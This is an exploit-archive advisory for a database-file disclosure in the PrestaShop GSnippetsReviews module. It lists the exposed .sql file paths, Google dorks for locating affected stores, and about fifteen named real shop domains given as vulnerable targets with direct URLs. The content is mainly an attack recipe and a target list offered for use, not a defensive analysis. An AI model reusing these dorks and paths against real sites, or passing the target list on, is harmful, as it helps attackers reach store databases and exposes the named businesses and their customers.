PrestaShop Google GSnippetsReviews 1.6.1.4 Database Disclosure

`####################################################################  
  
# Exploit Title : PrestaShop Google GSnippetsReviews Modules 1.6.1.4  
Database Backup Disclosure  
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security  
Army  
# Date : 24/12/2018  
# Vendor Homepage : prestashop.com  
# Software Download Link :  
addons.prestashop.com/en/seo-natural-search-engine-optimization/  
6144-customer-ratings-and-reviews-pro-google-rich-snippets.html  
+ sourceforge.net/projects/prestashopratingreview/  
+  
codecanyon.net/item/prestashop-products-review-google-rich-snippets-module/20545945  
+  
storeprestamodules.com/prestashop-modules-google-snippets-product-reviews.html  
# Software Price : 100 Euro  
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : 1.4.11.0A+- - 1.4.7.0 - 1.4.6.2 - 1.5.4.0 -  
1.5.6.1- 1.5.6.2 - 1.5.3.1 - 1.6.0.12A+- - 1.6.1.1A+- - 1.6.1.4A+-  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/modules/gsnippetsreviews/sql/''  
intext:''A(c) 2013 - Vinta Quatre. Tous droits rA(c)servA(c)s - CrA(c)ation Yellow  
Agence Internet''  
intext:''A(c) 2018 - DECO LED VLC''  
intext:''Powered by e-com''  
intext:''A(c) 2018 Sud Corner tous droits rA(c)servA(c)s''  
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access  
Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]  
  
####################################################################  
  
# Exploit :  
  
/modules/gsnippetsreviews/sql/install.sql  
  
/modules/gsnippetsreviews/sql/uninstall.sql  
  
/modules/gsnippetsreviews/sql/update-date-rating.sql  
  
/modules/gsnippetsreviews/sql/update-lang-review.sql  
  
/modules/gsnippetsreviews/sql/update-voucher-fb.sql  
  
###################################################################  
  
# Example Vulnerable Sites =>  
  
[+] vinta-quatre.com/modules/gsnippetsreviews/sql/uninstall.sql  
  
[+] himmelslaternen.ch/modules/gsnippetsreviews/sql/install.sql  
  
[+] decoledvalencia.com/modules/gsnippetsreviews/sql/install.sql  
  
[+] cactose-boutique.fr/modules/gsnippetsreviews/sql/install.sql  
  
[+] kakicrazy.fr/modules/gsnippetsreviews/sql/install.sql  
  
[+]  
originalveniceshop.com/modules/gsnippetsreviews/sql/update-date-rating.sql  
  
[+] sudcorner.com/modules/gsnippetsreviews/sql/update-lang-review.sql  
  
[+] cobureau.net/modules/gsnippetsreviews/sql/update-voucher-fb.sql  
  
[+] mondo-bougies.com/modules/gsnippetsreviews/sql/update-date-rating.sql  
  
[+] rygeshop.dk/modules/gsnippetsreviews/sql/update-voucher-fb.sql  
  
[+] nsbconcept.com/modules/gsnippetsreviews/sql/update-date-rating.sql  
  
[+] ventiladorestecho.net/modules/gsnippetsreviews/sql/uninstall.sql  
  
[+] mediaperfect.fr/shop/modules/gsnippetsreviews/sql/install.sql  
  
[+] tu-instrumento.com.ar/modules/gsnippetsreviews/sql/update-voucher-fb.sql  
  
[+]  
multicouche-et-accessoires.fr/modules/gsnippetsreviews/sql/update-date-rating.sql  
  
####################################################################  
  
# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security  
Team  
  
####################################################################  
`